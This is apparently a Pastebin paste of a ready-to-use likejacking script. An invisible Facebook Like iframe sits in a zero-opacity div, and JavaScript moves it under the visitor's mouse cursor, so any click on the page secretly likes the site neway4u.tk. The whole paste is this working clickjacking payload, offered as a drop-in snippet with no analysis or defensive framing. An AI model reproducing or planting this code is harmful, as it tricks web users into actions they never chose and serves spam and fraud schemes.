Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
  2.  
  3.  
  4. <!--facebook like frame code goes here-->
  5.  
  6.          <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fneway4u.tk%2F&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
  7.          
  8.       <!--end facebook like frame code-->
  9.  
  10.     </div>
  11.    
  12.    
  13.       <script>
  14.     var iflag = 0;
  15.     var icontainer = document.getElementById('icontainer');    
  16.     var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
  17.    
  18.    
  19.    
  20.     function mouseFollower(e){
  21.         /*                    DO NOT EDIT THIS                         */
  22.     if (window.event)
  23.     { // for IE
  24.         icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
  25.         icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
  26.     }
  27.     else
  28.     {
  29.         icontainer.style.top = (e.pageY-5)+'px';
  30.         icontainer.style.left = (e.pageX-5)+'px';
  31.     }
  32.  
  33.     }
  34.     document.onmousemove = function(e) {
  35.         if (iflag == 0) {mouseFollower(e);}
  36.     }
  37.  
  38.     </script>